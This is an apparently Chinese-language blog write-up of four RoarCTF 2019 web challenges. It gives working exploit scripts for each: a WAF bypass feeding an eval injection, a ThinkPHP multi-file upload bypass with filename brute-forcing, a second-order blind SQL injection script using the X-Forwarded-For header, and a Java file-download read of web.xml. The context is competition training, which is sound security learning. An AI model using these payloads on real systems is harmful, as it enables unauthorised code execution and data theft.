
 <!DOCTYPE HTML>
<html lang="cn-zh">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>RoarCTF2019_Web赛后复盘 | flag0&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="flag0">
    

    
    <meta name="description" content="涉及知识点：字符串解析bypass waf、二次注入、Thinkphp文件上传、java Web基础知识">
<meta name="keywords" content="writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="RoarCTF2019_Web赛后复盘">
<meta property="og:url" content="http://flag0.com/2019/10/20/RoarCTF-Web赛后复盘/index.html">
<meta property="og:site_name" content="flag0&#39;s Blog">
<meta property="og:description" content="涉及知识点：字符串解析bypass waf、二次注入、Thinkphp文件上传、java Web基础知识">
<meta property="og:locale" content="cn-zh">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571730688021.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571733959259.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571734399368.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571734497866.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571734549956.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571734941276.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571735676072.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571735494041.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571735946302.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571741538240.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571744576495.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571744830940.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571744786263.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571745281920.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571745678660.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571746850015.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571747396933.png">
<meta property="og:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571747429208.png">
<meta property="og:updated_time" content="2019-10-31T09:56:30.299Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="RoarCTF2019_Web赛后复盘">
<meta name="twitter:description" content="涉及知识点：字符串解析bypass waf、二次注入、Thinkphp文件上传、java Web基础知识">
<meta name="twitter:image" content="http://flag0.com/img/images/RoarCTF_Web赛后复盘/1571730688021.png">

    
    <link rel="alternative" href="/atom.xml" title="flag0&#39;s Blog" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/jacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/jacman.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="flag0&#39;s Blog">flag0&#39;s Blog</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="菜单">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="搜索" />
						<input type="hidden" name="q" value="site:flag0.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
  
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/10/20/RoarCTF-Web赛后复盘/" title="RoarCTF2019_Web赛后复盘" itemprop="url">RoarCTF2019_Web赛后复盘</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="flag0" target="_blank" itemprop="author">flag0</a>
		
  <p class="article-time">
    <time datetime="2019-10-20T13:05:19.000Z" itemprop="datePublished"> 发表于 2019-10-20</time>
    
  </p>
</header>
	<div class="article-content">
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">文章目录</strong>
		
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Calc"><span class="toc-number">1.</span> <span class="toc-text">Easy Calc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Simle-Upload"><span class="toc-number">2.</span> <span class="toc-text">Simle Upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Online-Proxy"><span class="toc-number">3.</span> <span class="toc-text">Online Proxy</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Java"><span class="toc-number">4.</span> <span class="toc-text">Easy Java</span></a></li></ol>
		
		</div>
		
		<p>涉及知识点：字符串解析bypass waf、二次注入、Thinkphp文件上传、java Web基础知识</p>
<a id="more"></a>
<h2 id="Easy-Calc"><a href="#Easy-Calc" class="headerlink" title="Easy Calc"></a>Easy Calc</h2><p>打开题目后是个计算器</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571730688021.png" alt="1571730688021"></p>
<p>右击查看源代码发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--I&apos;ve set up WAF to ensure security.--&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">    $(&apos;#calc&apos;).submit(function()&#123;</span><br><span class="line">        $.ajax(&#123;</span><br><span class="line">            url:&quot;calc.php?num=&quot;+encodeURIComponent($(&quot;#content&quot;).val()),</span><br><span class="line">            type:&apos;GET&apos;,</span><br><span class="line">            success:function(data)&#123;</span><br><span class="line">                $(&quot;#result&quot;).html(`&lt;div class=&quot;alert alert-success&quot;&gt;</span><br><span class="line">            &lt;strong&gt;答案:&lt;/strong&gt;$&#123;data&#125;</span><br><span class="line">            &lt;/div&gt;`);</span><br><span class="line">            &#125;,</span><br><span class="line">            error:function()&#123;</span><br><span class="line">                alert(&quot;这啥?算不来!&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;)</span><br><span class="line">        return false;</span><br><span class="line">    &#125;)</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>发现calc.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'num'</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $str = $_GET[<span class="string">'num'</span>];</span><br><span class="line">        $blacklist = [<span class="string">' '</span>, <span class="string">'\t'</span>, <span class="string">'\r'</span>, <span class="string">'\n'</span>,<span class="string">'\''</span>, <span class="string">'"'</span>, <span class="string">'`'</span>, <span class="string">'\['</span>, <span class="string">'\]'</span>,<span class="string">'\$'</span>,<span class="string">'\\'</span>,<span class="string">'\^'</span>];</span><br><span class="line">        <span class="keyword">foreach</span> ($blacklist <span class="keyword">as</span> $blackitem) &#123;</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">'/'</span> . $blackitem . <span class="string">'/m'</span>, $str)) &#123;</span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">"what are you want to do?"</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">'echo '</span>.$str.<span class="string">';'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>calc.php页面有命令执行功能<code>eval(&#39;echo &#39;.$str.&#39;;&#39;);</code>，但是需要绕过<code>blacklist</code>，在实际测试中发现<code>num</code>参数，传入字符时页面返回403，因为calc页面黑名单中有<code>$</code>、<code>^</code>所以我们没有办法轻易构造出无字符的命令执行payload，根据上一个页面中的<code>I&#39;ve set up WAF to ensure security</code>可以大概判断，这里使用了web防火墙，我们可以利用php的字符解析特性进行bypass</p>
<p>php在解析GET和POST传参时通常会自动应用<code>parse_str</code>函数，利用具体可以参考<code>https://www.freebuf.com/articles/web/213359.html</code>，这里我们可以进行一个简单的fuzz，因为这里是没有中间的<code>_</code>的，所以，我们只测试参数左边和右边的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">255</span>):</span><br><span class="line">    url = <span class="string">"http://node3.buuoj.cn:28014/calc.php?&#123;0&#125;num=aaaaaaaaaaaa"</span>.format(urllib.parse.quote(chr(i)))</span><br><span class="line">    st = requests.get(url)</span><br><span class="line">    <span class="keyword">if</span>(st.status_code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">"aaaaaaaaaaaa"</span> <span class="keyword">in</span> st.text):</span><br><span class="line">        print(<span class="string">"[+]"</span>,i,urllib.parse.quote(chr(i)),url)</span><br></pre></td></tr></table></figure>
<p>最后测试结果只有<code>calc.php?%20num=xxx</code>才可以绕过waf并且正常执行。</p>
<p>接下来执行phpinfo</p>
<p><code>http://node3.buuoj.cn:28014/calc.php?%20num=phpinfo()</code></p>
<p>查看disable_functions</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571733959259.png" alt="1571733959259"></p>
<p>发现禁用了很多函数，<code>file_get_fontents()</code>并没有在其中，但是单双引号被屏蔽了，我们可以使用<code>chr()</code>函数来进行ascii转字符拼接来绕过。</p>
<p>查看flag路径</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571734399368.png" alt="1571734399368"></p>
<p>读取flag</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571734497866.png" alt="1571734497866"></p>
<p>使用<code>file_get_fontents()</code>来进行读取</p>
<p><code>http://node3.buuoj.cn:28014/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))</code></p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571734549956.png" alt="1571734549956"></p>
<h2 id="Simle-Upload"><a href="#Simle-Upload" class="headerlink" title="Simle Upload"></a>Simle Upload</h2><p>打开后发现是调用Thinkphp框架上传的代码</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571734941276.png" alt="1571734941276"></p>
<p>上传后的文件名基于<code>uniqid</code>函数生成</p>
<p>如果想要上传需要自己构建路由</p>
<p><code>http://6e3f9123-cf04-4473-b57a-3d4ee79af4e6.node3.buuoj.cn/?m=home&amp;c=index&amp;a=upload</code></p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571735676072.png" alt="1571735676072"></p>
<p>可以看到代码中进行了php后缀的判断，如果是php后缀直接返回false停止上传</p>
<p>但是仔细读一下代码，可以发现</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571735494041.png" alt="1571735494041"></p>
<p>这里使用了<code>upload()</code>来进行上传，可以一次上传多个文件，并且file变量名这里可以任意输入，而该代码逻辑只检测变量名为<code>file</code>的值，所以我们这里可以修改上传时的变量名来进行绕过。</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571735946302.png" alt="1571735946302"></p>
<p>这里只会输出file变量的上传文件名，所以，我们需要构建多文件上传，然后爆破文件名，其中的<code>allowExts</code>并没有作用。</p>
<p>附上代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">GetSimple_Upload</span><span class="params">(url)</span>:</span></span><br><span class="line">    path = url + <span class="string">"/?m=home&amp;c=index&amp;a=upload"</span></span><br><span class="line">    files = &#123;<span class="string">"file"</span>:(<span class="string">"flag0.txt"</span>,<span class="string">'a'</span>), <span class="string">"file1"</span>:(<span class="string">"flag0.php"</span>, <span class="string">'&lt;?php phpinfo();'</span>)&#125;</span><br><span class="line">    r = requests.post(path, files=files)</span><br><span class="line">    t1 = r.text.split(<span class="string">"/"</span>)[<span class="number">-1</span>].split(<span class="string">"."</span>)[<span class="number">0</span>]</span><br><span class="line">    print(t1)</span><br><span class="line">    t1 = int(t1, <span class="number">16</span>)</span><br><span class="line">    print(t1)</span><br><span class="line"></span><br><span class="line">    j = t1</span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">        path = url + <span class="string">"/Public/Uploads/2019-10-22/&#123;0&#125;.php"</span>.format(hex(j)[<span class="number">2</span>:])</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            r = requests.get(path, timeout=<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">if</span> r.status_code != <span class="number">404</span>:</span><br><span class="line">            <span class="keyword">print</span> (path,r.text)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        print(j, hex(j)[<span class="number">2</span>:], r.status_code)</span><br><span class="line">        j -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    url = <span class="string">"http://6e3f9123-cf04-4473-b57a-3d4ee79af4e6.node3.buuoj.cn"</span></span><br><span class="line">    GetSimple_Upload(url)</span><br></pre></td></tr></table></figure>
<p>这里直接上传到php文件后，php内容会自动修改为flag，直接访问读取即可</p>
<h2 id="Online-Proxy"><a href="#Online-Proxy" class="headerlink" title="Online Proxy"></a>Online Proxy</h2><p>原来以为这个是ssrf，结果尝试了很长时间，发现是二次注入</p>
<p>抓包对页面进行测试，发现debug部分有ip信息，使用<code>x-forwarded-for</code>可以控制</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571741538240.png" alt="1571741538240"></p>
<p>经过多次尝试发现此处存在二次注入，会将当前ip经过处理带入数据库</p>
<p>攻击流程如下：</p>
<ul>
<li>第一次执行语句，使payload插入数据库中</li>
<li>第二次执行语句，使payload显示在Lastip的位置</li>
<li>第三次执行语句，使payload生效，显示攻击返回结果</li>
</ul>
<p>利用此原理，我们可以编写脚本，这里可以使用布尔盲注也可以使用延时注入</p>
<p>编写脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getDataLen</span><span class="params">(url)</span>:</span></span><br><span class="line">    len = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">        s = requests.session()</span><br><span class="line">        Payload = <span class="string">"1'/**/and/**/length((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e))=&#123;0&#125;/**/and/**/'1"</span>.format(len)</span><br><span class="line">        head = &#123;</span><br><span class="line">                <span class="string">"x-forwarded-for"</span>:Payload,</span><br><span class="line">            &#125;</span><br><span class="line">        s.get(url,headers=head)<span class="comment">#第一次插入 测试数据1</span></span><br><span class="line">        Payload = <span class="string">"1'/**/and/**/length((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e))=&#123;0&#125;/**/and/**/'1"</span>.format(len+<span class="number">1</span>)</span><br><span class="line">        head = &#123;</span><br><span class="line">                <span class="string">"x-forwarded-for"</span>:Payload,</span><br><span class="line">            &#125;</span><br><span class="line">        s.get(url,headers=head) <span class="comment">#第二次插入数据2，测试数据1显示</span></span><br><span class="line">        rep = s.get(url,headers=head).text <span class="comment">#第三次插入数据2，测试数据1生效</span></span><br><span class="line">        last_ip = re.findall(<span class="string">'Last Ip: (\d)+'</span>, rep)[<span class="number">0</span>]</span><br><span class="line">        <span class="keyword">if</span> str(last_ip) == <span class="string">"1"</span>:</span><br><span class="line">            <span class="keyword">return</span> len</span><br><span class="line">        len += <span class="number">1</span></span><br><span class="line">        print(Payload,last_ip)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getDataName</span><span class="params">(url,dbLen)</span>:</span></span><br><span class="line">    flag = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,dbLen+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">            s = requests.session()</span><br><span class="line">            Payload = <span class="string">"1'/**/and/**/ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),&#123;0&#125;,1))=&#123;1&#125;/**/and/**/'1"</span>.format(i,j)</span><br><span class="line">            head = &#123;</span><br><span class="line">                    <span class="string">"x-forwarded-for"</span>:Payload,</span><br><span class="line">                &#125;</span><br><span class="line">            s.get(url,headers=head)<span class="comment">#第一次插入 测试数据1</span></span><br><span class="line">            Payload = <span class="string">"1'/**/and/**/ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),&#123;0&#125;,1))=&#123;1&#125;/**/and/**/'1"</span>.format(i, j+<span class="number">1</span>)</span><br><span class="line">            head = &#123;</span><br><span class="line">                    <span class="string">"x-forwarded-for"</span>:Payload,</span><br><span class="line">                &#125;</span><br><span class="line">            s.get(url,headers=head)<span class="comment">#第一次插入数据2，测试数据1显示</span></span><br><span class="line">            rep = s.get(url,headers=head).text<span class="comment">#第二次插入数据2，测试数据1生效</span></span><br><span class="line">            last_ip = re.findall(<span class="string">'Last Ip: (\d)+'</span>, rep)[<span class="number">0</span>]</span><br><span class="line">            <span class="keyword">if</span> str(last_ip) == <span class="string">"1"</span>:</span><br><span class="line">                flag += chr(j)</span><br><span class="line">                print(<span class="string">"[+]:"</span>,flag)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            print(i,j,last_ip,flag)</span><br><span class="line">    <span class="keyword">return</span> flag</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	DataLen = getDataLen(url)</span><br><span class="line">	print(<span class="string">"[+]"</span>,DataLen)</span><br><span class="line">	flag = getDataName(url,DataLen)</span><br><span class="line">	print(<span class="string">"[+]:"</span>,flag)</span><br></pre></td></tr></table></figure>
<p>此处有个坑点，在当前库是查询不到内容的，需要跨库查询</p>
<ul>
<li>数据库<code>F4l9_D4t4B45e</code></li>
<li>数据表<code>F4l9_t4b1e</code></li>
<li>列名 <code>F4l9_C01uMn</code></li>
</ul>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571744576495.png" alt="1571744576495"></p>
<h2 id="Easy-Java"><a href="#Easy-Java" class="headerlink" title="Easy Java"></a>Easy Java</h2><p><img src="\img\images\RoarCTF_Web赛后复盘\1571744830940.png" alt="1571744830940"></p>
<p>打开后是个登陆页面，点击help发现跳转到</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571744786263.png" alt="1571744786263"></p>
<p>但是并不能下载，尝试post方式传参后可以成功下载</p>
<p>这里考察java Web基础知识，，，，</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571745281920.png" alt="1571745281920"></p>
<p>可以成功下载文件了，下一步开始读取初始化配置信息</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571745678660.png" alt="1571745678660"></p>
<p>查看web.xml</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571746850015.png" alt="1571746850015"></p>
<p>读取class文件</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571747396933.png" alt="1571747396933"></p>
<p>打开文件</p>
<p><img src="\img\images\RoarCTF_Web赛后复盘\1571747429208.png" alt="1571747429208"></p>
<p>解密base64编码即可</p>
  
	</div>
		<footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/安全竞赛/">安全竞赛</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/writeup/">writeup</a>
  </div>

</div>



	<div class="article-share" id="share">
	
	  <div data-url="http://flag0.com/2019/10/20/RoarCTF-Web赛后复盘/" data-title="RoarCTF2019_Web赛后复盘 | flag0&#39;s Blog" data-tsina="" class="share clearfix">
	  </div>
	
	</div>


</footer>

   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2019/10/31/ciscn2019-华北赛区-Day1-Dropbox/" title="ciscn2019 华北赛区 Day1 Dropbox">
  <strong>上一篇：</strong><br/>
  <span>
  ciscn2019 华北赛区 Day1 Dropbox</span>
</a>
</div>


<div class="next">
<a href="/2019/10/06/北极星杯AWD总结/"  title="北极星杯AWD总结">
 <strong>下一篇：</strong><br/> 
 <span>北极星杯AWD总结
</span>
</a>
</div>

</nav>

	



</div>  
      <div class="openaside"><a class="navbutton" href="#" title="显示侧边栏"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">文章目录</strong>
 
 <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Calc"><span class="toc-number">1.</span> <span class="toc-text">Easy Calc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Simle-Upload"><span class="toc-number">2.</span> <span class="toc-text">Simle Upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Online-Proxy"><span class="toc-number">3.</span> <span class="toc-text">Online Proxy</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Java"><span class="toc-number">4.</span> <span class="toc-text">Easy Java</span></a></li></ol>
 
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="隐藏侧边栏"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">分类</p>
		<ul>
		
		  
			<li><a href="/categories/安全竞赛/" title="安全竞赛">安全竞赛<sup>25</sup></a></li>
		  
		
		  
			<li><a href="/categories/编程开发/" title="编程开发">编程开发<sup>17</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">标签</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/docker/" title="docker">docker<sup>6</sup></a></li>
			
		
			
				<li><a href="/tags/Writeup/" title="Writeup">Writeup<sup>5</sup></a></li>
			
		
			
				<li><a href="/tags/python/" title="python">python<sup>4</sup></a></li>
			
		
			
				<li><a href="/tags/redis/" title="redis">redis<sup>3</sup></a></li>
			
		
			
				<li><a href="/tags/山东省大学生信息安全竞赛/" title="山东省大学生信息安全竞赛">山东省大学生信息安全竞赛<sup>3</sup></a></li>
			
		
			
				<li><a href="/tags/AWD/" title="AWD">AWD<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/汇编/" title="汇编">汇编<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/学习笔记/" title="学习笔记">学习笔记<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/Docker/" title="Docker">Docker<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/自动化/" title="自动化">自动化<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/PE/" title="PE">PE<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/铁人三项/" title="铁人三项">铁人三项<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/综合渗透/" title="综合渗透">综合渗透<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/流量混淆/" title="流量混淆">流量混淆<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/安恒杯Web安全测试大赛/" title="安恒杯Web安全测试大赛">安恒杯Web安全测试大赛<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/攻击脚本/" title="攻击脚本">攻击脚本<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/XAMPP/" title="XAMPP">XAMPP<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/error/" title="error">error<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Jenkins/" title="Jenkins">Jenkins<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/cve-2019-0708/" title="cve_2019_0708">cve_2019_0708<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">友情链接</p>
    <ul>
        
          <li>
            
            	<a href="http://www.ccdebug.com/" target="_blank" title="ccdebug">ccdebug</a>
            
          </li>
        
          <li>
            
            	<a href="https://y-y-k.tk/" target="_blank" title="y-y-k">y-y-k</a>
            
          </li>
        
          <li>
            
            	<a href="https://0clickjacking0.github.io/" target="_blank" title="xianyu123">xianyu123</a>
            
          </li>
        
          <li>
            
            	<a href="https://www.virtua1.cn" target="_blank" title="Virtua1">Virtua1</a>
            
          </li>
        
          <li>
            
            	<a href="http://v0w.top" target="_blank" title="V0W">V0W</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.cnblogs.com/test404" target="_blank" title="胖虎">胖虎</a>
            
          </li>
        
          <li>
            
            	<a href="http://p0desta.com" target="_blank" title="p0desta">p0desta</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.test407.cn" target="_blank" title="薯片博客">薯片博客</a>
            
          </li>
        
          <li>
            
            	<a href="https://alem0n.github.io" target="_blank" title="lem0n">lem0n</a>
            
          </li>
        
    </ul>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	
	<section class="info">
		<p> Rise and rise again until lambs become lions <br/>
			Everyone can cook, but only those who dare to try can become the real chef.</p>
	</section>
	 
	<div class="social-font" class="clearfix">
		
		
		<a href="https://github.com/flag0" target="_blank" class="icon-github" title="github"></a>
		
		
		
		
		
		
		
		
		
		<a href="mailto:root@flag0.com" target="_blank" class="icon-email" title="Email Me"></a>
		
	</div>
			
		

		<p class="copyright">
		Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/wuchong/jacman" target="_blank" title="Jacman">Jacman</a> © 2020 
		
		<a href="/about" target="_blank" title="flag0">flag0</a>
		
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
